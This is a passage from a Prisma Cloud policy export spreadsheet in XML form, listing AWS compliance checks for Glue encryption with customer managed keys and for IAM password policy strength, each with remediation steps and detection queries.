          <t>Data protection</t>
        </is>
      </c>
      <c r="D44" t="inlineStr"/>
      <c r="E44" t="inlineStr"/>
      <c r="F44" t="inlineStr"/>
      <c r="G44" t="b">
        <v>0</v>
      </c>
      <c r="H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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J44" t="inlineStr">
        <is>
          <t>aws-glue</t>
        </is>
      </c>
      <c r="K44" t="inlineStr">
        <is>
          <t>AWS Glue Data Catalog not encrypted by Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L44" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M44" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N44" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O44" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P44" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q44" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R44" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S44" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T44" t="b">
        <v>0</v>
      </c>
      <c r="U44" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V44" t="inlineStr">
        <is>
          <t>aws-glue-datacatalog</t>
        </is>
      </c>
      <c r="W44" t="inlineStr">
        <is>
          <t>This policy identifies AWS Glue Data Catalog that is encrypted using the default KMS key instead of CMK (Customer Managed Key) or using the CMK that is disabled.
AWS Glue Data Catalog is a managed metadata repository centralizing schema information for AWS Glue resources, facilitating data discovery and management. To protect sensitive data from unauthorized access, users can specify CMK to get enhanced security, and control over the encryption key and comply with any regulatory requirements.
It is recommended to use a CMK to encrypt the AWS Glue Data Catalog as it provides complete control over the encrypted data.</t>
        </is>
      </c>
      <c r="X44" t="inlineStr">
        <is>
          <t>To enable the encryption for Glue data catalog
1. Sign in to the AWS Management Console, Go to the AWS Management Console at https://console.aws.amazon.com/.
2. Navigate to the reported resource region by selecting the region from the dropdown in the top right corner.
3. Navigate to AWS Glue: In the 'Find Services' search box, type 'Glue' and select 'AWS Glue' from the search results.
4. Choose the 'Data Catalog' dropdown in the navigation pane and select 'Catalog settings'.
5. On the 'Data catalog settings' page, select the 'Metadata encryption' check box, and choose an AWS KMS CMK key that you are managing according to your business requirements.
Note: When you use a customer managed key to encrypt your Data Catalog, the Data Catalog provides an option to register an IAM role to encrypt and decrypt resources. You need to grant your IAM role permissions that AWS Glue can assume on your behalf. This includes AWS KMS permissions to encrypt and decrypt data.
6. To enable an IAM role that AWS Glue can assume to encrypt and decrypt data on your behalf, select the 'Delegate KMS operations to an IAM role' option.
7. Select an IAM role equipped with the necessary permissions to conduct the required KMS operations for AWS Glue to assume.
8. To Encrypt connection passwords, select 'Encrypt connection passwords', and choose an AWS KMS CMK key that you are managing according to your business requirements.
9. And click 'save'.</t>
        </is>
      </c>
      <c r="Y44" t="inlineStr"/>
      <c r="Z44" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-glue-datacatalog' as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.keyManager does not equal CUSTOMER or (keyMetadata.keyManager equals CUSTOMER and keyMetadata.keyState equals Disabled) as Y; filter '($.X.DataCatalogEncryptionSettings.EncryptionAtRest.CatalogEncryptionMode equals "DISABLED" or $.X.ConnectionPasswordEncryption.ReturnConnectionPasswordEncrypted equals "false") or ($.X.DataCatalogEncryptionSettings.EncryptionAtRest.SseAwsKmsKeyId exists and ($.X.DataCatalogEncryptionSettings.EncryptionAtRest.SseAwsKmsKeyId equals $.Y.keyMetadata.arn or $.X.DataCatalogEncryptionSettings.EncryptionAtRest.SseAwsKmsKeyId starts with "alias/aws/")) or ($.X.DataCatalogEncryptionSettings.ConnectionPasswordEncryption.AwsKmsKeyId exists and ($.X.DataCatalogEncryptionSettings.ConnectionPasswordEncryption.AwsKmsKeyId equals $.Y.keyMetadata.arn or  $.X.DataCatalogEncryptionSettings.ConnectionPasswordEncryption.AwsKmsKeyId starts with "alias/aws/"))' ; show X;</t>
        </is>
      </c>
      <c r="AA44" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB44" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC44" t="inlineStr">
        <is>
          <t>PC-AWS-GLU-1141</t>
        </is>
      </c>
      <c r="AD44" t="b">
        <v>1</v>
      </c>
      <c r="AE44" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF44" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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4" t="inlineStr">
        <is>
          <t>c5945fda-9ddc-4228-8d8b-9d9e7865d024</t>
        </is>
      </c>
      <c r="AI44" t="inlineStr">
        <is>
          <t>282c3c78-c9e2-4a1b-9d58-90e763b650c8</t>
        </is>
      </c>
      <c r="AJ44" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK44" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B45" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C45" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D45" t="inlineStr"/>
      <c r="E45" t="inlineStr"/>
      <c r="F45" t="inlineStr"/>
      <c r="G45" t="b">
        <v>0</v>
      </c>
      <c r="H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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J45" t="inlineStr">
        <is>
          <t>aws-glue</t>
        </is>
      </c>
      <c r="K45" t="inlineStr">
        <is>
          <t>AWS Glue Job not encrypted by Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L45" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M45" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N45" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O45" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P45" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q45" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R45" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S45" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T45" t="b">
        <v>0</v>
      </c>
      <c r="U45" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V45" t="inlineStr">
        <is>
          <t>aws-glue-job</t>
        </is>
      </c>
      <c r="W45" t="inlineStr">
        <is>
          <t>This policy identifies AWS Glue jobs that are encrypted using the default KMS key instead of CMK (Customer Managed Key) or using the CMK that is disabled.
AWS Glue allows you to specify whether the data processed by the job should be encrypted when stored in data storage locations such as Amazon S3. To protect sensitive data from unauthorized access, users can specify CMK to get enhanced security, and control over the encryption key and also comply with any regulatory requirements.
It is recommended to use a CMK to encrypt the AWS Glue job data as it provides complete control over the encrypted data.</t>
        </is>
      </c>
      <c r="X45" t="inlineStr">
        <is>
          <t>To encrypt data processed by AWS Glue jobs, configure encryption settings within the security configuration of the Glue job. Security configurations cannot be edited from the console, so we need to create a new security configuration with the necessary settings and attach it to the existing Glue job.
To add a security configuration using the AWS Glue console,
1. Sign in to the AWS Management Console: Go to the AWS Management Console at https://console.aws.amazon.com/.
2. Navigate to the reported resource region by selecting the region from the dropdown in the top right corner.
3. Navigate to AWS Glue: In the "Find Services" search box, type "Glue" and select "AWS Glue" from the search results.
4. To add a security configuration using the AWS Glue console, choose 'Security Configurations' in the navigation pane.
5. Choose 'Add security configuration'.
6. on the Security configuration properties, Enter a unique security configuration name in the name text box.
7. To Enable S3 encryption, select the checkbox under the 'Enable S3 encryption' section.
8. Select the 'SSE-KMS' option in the 'Encryption mode' and choose an AWS KMS CMK key, or choose Enter a key ARN of the CMK and provide the ARN for the key that you are managing according to your business requirements.
9. Click 'Create' to create a security configuration.
To add a security configuration to the existing glue job.
1. Sign in to the AWS Management Console: Go to the AWS Management Console at https://console.aws.amazon.com/.
2. Navigate to the reported resource region by selecting the region from the dropdown in the top right corner.
3. Navigate to AWS Glue: In the "Find Services" search box, type "Glue" and select "AWS Glue" from the search results.
4. Choose the ETL jobs in the navigation pane.
5. select the reported job under the Your Jobs section.
6. select the Job details tab.
7. select the newly created security configuration from the dropdown in the 'Security configuration' section under the 'Advance properties' dropdown.
8. Click 'Save'.
To enable the KMS CMK key, please refer to the below link.
https://docs.aws.amazon.com/kms/latest/developerguide/enabling-keys.html#enabling-keys-console</t>
        </is>
      </c>
      <c r="Y45" t="inlineStr"/>
      <c r="Z45" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-glue-job' as X; config from cloud.resource where api.name = 'aws-glue-security-configuration' as Y; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.keyManager does not equal CUSTOMER or (keyMetadata.keyManager equals CUSTOMER and keyMetadata.keyState equals Disabled) as Z; filter '$.X.SecurityConfiguration does not exist or ( $.X.SecurityConfiguration equals $.Y.name and ($.Y.encryptionConfiguration.s3Encryption[*].s3EncryptionMode does not equal "SSE-KMS" or ($.Y.encryptionConfiguration.s3Encryption[*].kmsKeyArn exists and $.Y.encryptionConfiguration.s3Encryption[*].kmsKeyArn equals $.Z.keyMetadata.arn)))' ; show X;</t>
        </is>
      </c>
      <c r="AA45" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB45" t="inlineStr">
        <is>
          <t>2024-11-12 00:00:45</t>
        </is>
      </c>
      <c r="AC45" t="inlineStr">
        <is>
          <t>PC-AWS-GLU-1137</t>
        </is>
      </c>
      <c r="AD45" t="b">
        <v>1</v>
      </c>
      <c r="AE45" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF45" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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5" t="inlineStr">
        <is>
          <t>d7aa057f-cf60-46b0-bb6a-de9c4e338337</t>
        </is>
      </c>
      <c r="AI45" t="inlineStr">
        <is>
          <t>5a103a44-8f80-4a5f-84ad-299c0206d43b</t>
        </is>
      </c>
      <c r="AJ45" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK45" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B46" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C46" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D46" t="inlineStr"/>
      <c r="E46" t="inlineStr"/>
      <c r="F46" t="inlineStr"/>
      <c r="G46" t="b">
        <v>1</v>
      </c>
      <c r="H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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J46" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K46" t="inlineStr">
        <is>
          <t>AWS IAM password policy does not expire in 90 days</t>
        </is>
      </c>
      <c r="L46" t="inlineStr">
        <is>
          <t>WEAK_PASSWORD</t>
        </is>
      </c>
      <c r="M46" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N46" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O46" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P46" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q46" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R46" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S46" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T46" t="b">
        <v>1</v>
      </c>
      <c r="U46" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V46" t="inlineStr">
        <is>
          <t>aws-iam-get-account-password-policy</t>
        </is>
      </c>
      <c r="W46" t="inlineStr">
        <is>
          <t>This policy identifies the IAM policies which does not have password expiration set to 90 days. AWS IAM (Identity &amp; Access Management) allows customers to secure AWS console access. As a security best practice, customers must have strong password policies in place.</t>
        </is>
      </c>
      <c r="X46" t="inlineStr">
        <is>
          <t>1. Login to the AWS console and navigate to the 'IAM' service.
2. On the left navigation panel, Click on 'Account Settings'
3. check 'Enable password expiration' and enter a password expiration period.
4. Click on 'Apply password policy' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-11
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-11</t>
        </is>
      </c>
      <c r="Y46"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46" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name='aws-iam-get-account-password-policy' AND json.rule='isDefaultPolicy is true or maxPasswordAge !isType Integer or $.maxPasswordAge &gt; 90 or maxPasswordAge equals 0'
{"category":"IAM","resourceTypes":["aws_iam_account_password_policy"]}</t>
        </is>
      </c>
      <c r="AA46" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB46" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC46" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-18-CKV_AWS_9</t>
        </is>
      </c>
      <c r="AD46" t="b">
        <v>1</v>
      </c>
      <c r="AE46" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF46" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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6" t="inlineStr">
        <is>
          <t>f53107a2-00b2-46fb-98a9-1f12262c7d44</t>
        </is>
      </c>
      <c r="AI46" t="inlineStr">
        <is>
          <t>f53107a2-00b2-46fb-98a9-1f12262c7d44</t>
        </is>
      </c>
      <c r="AJ46" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK46" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B47" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C47" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D47" t="inlineStr"/>
      <c r="E47" t="inlineStr"/>
      <c r="F47" t="inlineStr"/>
      <c r="G47" t="b">
        <v>1</v>
      </c>
      <c r="H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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J47" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K47" t="inlineStr">
        <is>
          <t>AWS IAM password policy does not have an uppercase character</t>
        </is>
      </c>
      <c r="L47" t="inlineStr">
        <is>
          <t>WEAK_PASSWORD</t>
        </is>
      </c>
      <c r="M47" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N47" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O47" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P47" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q47" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R47" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S47" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T47" t="b">
        <v>1</v>
      </c>
      <c r="U47" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V47" t="inlineStr">
        <is>
          <t>aws-iam-get-account-password-policy</t>
        </is>
      </c>
      <c r="W47" t="inlineStr">
        <is>
          <t>This policy identifies AWS accounts in which IAM password policy does not have an uppercase character. AWS IAM (Identity &amp; Access Management) allows customers to secure AWS console access. As a security best practice, customers must have strong password policies in place.</t>
        </is>
      </c>
      <c r="X47" t="inlineStr">
        <is>
          <t>1. Login to the AWS console and navigate to the 'IAM' service.
2. On the left navigation panel, Click on 'Account Settings'
3. check 'Require at least one uppercase letter'.
4. Click on 'Apply password policy' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-5
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-5</t>
        </is>
      </c>
      <c r="Y47"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47" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-iam-get-account-password-policy' AND json.rule='isDefaultPolicy is true or requireUppercaseCharacters is false or requireUppercaseCharacters does not exist'
{"category":"IAM","resourceTypes":["aws_iam_account_password_policy"]}</t>
        </is>
      </c>
      <c r="AA47" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB47" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC47" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-16-CKV_AWS_15</t>
        </is>
      </c>
      <c r="AD47" t="b">
        <v>1</v>
      </c>
      <c r="AE47" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF47" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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7" t="inlineStr">
        <is>
          <t>31626ca9-f659-4d25-9d88-fa32262bbba7</t>
        </is>
      </c>
      <c r="AI47" t="inlineStr">
        <is>
          <t>31626ca9-f659-4d25-9d88-fa32262bbba7</t>
        </is>
      </c>
      <c r="AJ47" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK47" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B48" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C48" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D48" t="n">
        <v>0</v>
      </c>
      <c r="E48" t="n">
        <v>49</v>
      </c>
      <c r="F48" t="n">
        <v>0</v>
      </c>
      <c r="G48" t="b">
        <v>1</v>
      </c>
      <c r="H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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J48" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K48" t="inlineStr">
        <is>
          <t>AWS IAM password policy does not have a number</t>
        </is>
      </c>
      <c r="L48" t="inlineStr">
        <is>
          <t>WEAK_PASSWORD</t>
        </is>
      </c>
      <c r="M48" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N48" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O48" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P48" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q48" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R48" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S48" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T48" t="b">
        <v>1</v>
      </c>
      <c r="U48" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V48" t="inlineStr">
        <is>
          <t>aws-iam-get-account-password-policy</t>
        </is>
      </c>
      <c r="W48" t="inlineStr">
        <is>
          <t>Checks to ensure that IAM password policy requires a number. AWS IAM (Identity &amp; Access Management) allows customers to secure AWS console access. As a security best practice, customers must have strong password policies in place.</t>
        </is>
      </c>
      <c r="X48" t="inlineStr">
        <is>
          <t>1. Login to the AWS console and navigate to the 'IAM' service.
2. On the left navigation panel, Click on 'Account Settings'
3. check 'Require at least one number'.
4. Click on 'Apply password policy' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-8
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-8</t>
        </is>
      </c>
      <c r="Y48"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48" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-iam-get-account-password-policy' AND json.rule='isDefaultPolicy is true or requireNumbers is false or requireNumbers does not exist'
{"category":"IAM","resourceTypes":["aws_iam_account_password_policy"]}</t>
        </is>
      </c>
      <c r="AA48" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB48" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC48" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-13-CKV_AWS_12</t>
        </is>
      </c>
      <c r="AD48" t="b">
        <v>1</v>
      </c>
      <c r="AE48" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF48" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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8" t="inlineStr">
        <is>
          <t>9a5813af-17a3-4058-be13-588ea00b4bfa</t>
        </is>
      </c>
      <c r="AI48" t="inlineStr">
        <is>
          <t>9a5813af-17a3-4058-be13-588ea00b4bfa</t>
        </is>
      </c>
      <c r="AJ48" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK48" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B49" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C49" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D49" t="inlineStr"/>
      <c r="E49" t="inlineStr"/>
      <c r="F49" t="inlineStr"/>
      <c r="G49" t="b">
        <v>1</v>
      </c>
      <c r="H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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J49" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K49" t="inlineStr">
        <is>
          <t>AWS IAM password policy does not have a lowercase character</t>
        </is>
      </c>
      <c r="L49" t="inlineStr">
        <is>
          <t>WEAK_PASSWORD</t>
        </is>
      </c>
      <c r="M49" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N49" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O49" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P49" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q49" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R49" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S49" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T49" t="b">
        <v>1</v>
      </c>
      <c r="U49" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V49" t="inlineStr">
        <is>
          <t>aws-iam-get-account-password-policy</t>
        </is>
      </c>
      <c r="W49" t="inlineStr">
        <is>
          <t>Checks to ensure that IAM password policy requires a lowercase character. AWS IAM (Identity &amp; Access Management) allows customers to secure AWS console access. As a security best practice, customers must have strong password policies in place.</t>
        </is>
      </c>
      <c r="X49" t="inlineStr">
        <is>
          <t>1. Login to the AWS console and navigate to the 'IAM' service.
2. On the left navigation panel, Click on 'Account Settings'
3. check 'Require at least one lowercase letter'.
4. Click on 'Apply password policy' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-6
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-6</t>
        </is>
      </c>
      <c r="Y49"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49" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-account-password-policy' AND json.rule='isDefaultPolicy is true or requireLowercaseCharacters is false or requireLowercaseCharacters does not exist'
{"category":"IAM","resourceTypes":["aws_iam_account_password_policy"]}</t>
        </is>
      </c>
      <c r="AA49" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB49" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC49" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-10-CKV_AWS_11</t>
        </is>
      </c>
      <c r="AD49" t="b">
        <v>1</v>
      </c>
      <c r="AE49" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF49" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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49" t="inlineStr">
        <is>
          <t>ef7c537b-72eb-42a7-bab7-cb2d22c76a0d</t>
        </is>
      </c>
      <c r="AI49" t="inlineStr">
        <is>
          <t>ef7c537b-72eb-42a7-bab7-cb2d22c76a0d</t>
        </is>
      </c>
      <c r="AJ49" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK49" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B50" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C50" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D50" t="inlineStr"/>
      <c r="E50" t="inlineStr"/>
      <c r="F50" t="inlineStr"/>
      <c r="G50" t="b">
        <v>1</v>
      </c>
      <c r="H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kfirdaus-alert-rule-test,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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J50" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K50" t="inlineStr">
        <is>
          <t>AWS IAM password policy does not have a symbol</t>
        </is>
      </c>
      <c r="L50" t="inlineStr">
        <is>
          <t>WEAK_PASSWORD</t>
        </is>
      </c>
      <c r="M50" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N50" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O50" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P50" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q50" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R50" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S50" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T50" t="b">
        <v>1</v>
      </c>
      <c r="U50" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V50" t="inlineStr">
        <is>
          <t>aws-iam-get-account-password-policy</t>
        </is>
      </c>
      <c r="W50" t="inlineStr">
        <is>
          <t>Checks to ensure that IAM password policy requires a symbol. AWS IAM (Identity &amp; Access Management) allows customers to secure AWS console access. As a security best practice, customers must have strong password policies in place.</t>
        </is>
      </c>
      <c r="X50" t="inlineStr">
        <is>
          <t>1. Login to the AWS console and navigate to the 'IAM' service.
2. On the left navigation panel, Click on 'Account Settings'
3. check 'Require at least one non-alphanumeric character'.
4. Click on 'Apply password policy' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-7
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-7</t>
        </is>
      </c>
      <c r="Y50"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50" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-iam-get-account-password-policy' AND json.rule='isDefaultPolicy is true or requireSymbols equals null or requireSymbols is false or requireSymbols does not exist'
{"category":"IAM","resourceTypes":["aws_iam_account_password_policy"]}</t>
        </is>
      </c>
      <c r="AA50" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB50" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC50" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-15-CKV_AWS_14</t>
        </is>
      </c>
      <c r="AD50" t="b">
        <v>1</v>
      </c>
